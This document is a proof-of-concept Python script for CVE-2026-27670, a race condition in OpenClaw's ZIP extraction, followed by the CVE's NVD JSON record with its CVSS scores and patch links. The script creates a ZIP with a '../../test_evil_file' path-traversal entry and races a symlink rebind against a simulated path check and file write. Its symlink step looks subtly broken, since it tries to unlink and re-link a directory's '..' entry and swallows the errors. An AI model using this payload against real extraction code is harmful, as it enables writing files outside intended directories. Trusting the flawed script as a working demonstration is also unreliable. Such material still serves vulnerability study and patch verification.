CVE-2026-27670

#!/usr/bin/env python3 """ CVE-2026-27670 PoC - OpenClaw ZIP Extraction Race Condition This PoC demonstrates the TOCTOU race condition in ZIP extraction. Note: This is for educational purposes only. """ import zipfile import os import time import threading import tempfile import shutil def create_malicious_zip(): """Create a ZIP file with path traversal payload""" zip_path = '/tmp/malicious.zip' with zipfile.ZipFile(zip_path, 'w') as zf: # Payload: Write to parent directory via relative path zf.writestr('../../test_evil_file', 'Malicious content planted!') return zip_path def race_condition_exploit(): """ Exploit the TOCTOU race condition: 1. Create a safe-looking symlink during path check 2. Rebind symlink before file write to redirect to target """ extract_dir = tempfile.mkdtemp(prefix='openclaw_extract_') symlink_path = os.path.join(extract_dir, '..') # Simulate the vulnerable extraction logic def check_path(path): # Time-of-Check: Path appears safe normalized = os.path.normpath(path) return normalized.startswith(extract_dir) def write_file(path, content): # Time-of-Use: Write file (vulnerable to race) full_path = os.path.join(extract_dir, path) with open(full_path, 'w') as f: f.write(content) # Race condition: rebind parent directory between check and write def rebind_symlink(): time.sleep(0.001) # Tiny window for race try: # Rebind parent to /tmp to demonstrate escape if os.path.exists(symlink_path): os.unlink(symlink_path) os.symlink('/tmp', symlink_path) except: pass # Trigger race condition thread = threading.Thread(target=rebind_symlink) thread.start() # Simulate vulnerable extraction malicious_path = '../../test_evil_file' if check_path(malicious_path): write_file(malicious_path, 'Malicious content!') thread.join() # Cleanup shutil.rmtree(extract_dir, ignore_errors=True) if __name__ == '__main__': print('CVE-2026-27670 PoC - Race Condition in ZIP Extraction') create_malicious_zip() print('Malicious ZIP created: /tmp/malicious.zip') print('Running race condition exploit...') race_condition_exploit()

{"cve": {"id": "CVE-2026-27670", "sourceIdentifier": "[email protected]", "published": "2026-03-19T02:16:02.173", "lastModified": "2026-03-19T19:18:45.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.3.2 contain a race condition vulnerability in ZIP extraction that allows local attackers to write files outside the intended destination directory. Attackers can exploit a time-of-check-time-of-use race between path validation and file write operations by rebinding parent directory symlinks to redirect writes outside the extraction root."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.3.2 contienen una vulnerabilidad de condición de carrera en la extracción de archivos ZIP que permite a atacantes locales escribir archivos fuera del directorio de destino previsto. Los atacantes pueden explotar una condición de carrera de tipo 'tiempo de verificación, tiempo de uso' entre la validación de rutas y las operaciones de escritura de archivos al reasignar enlaces simbólicos de directorios padre para redirigir las escrituras fuera de la raíz de extracción."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.2", "matchCriteriaId": "986EEC6C-F9E4-4B22-96D5-BBB98A4A738D"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/7dac9b05dd9d38dd3929637f26fa356fd8bdd107", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r54r-wmmq-mh84", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-write-via-zip-extraction-parent-symlink-race-condition", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}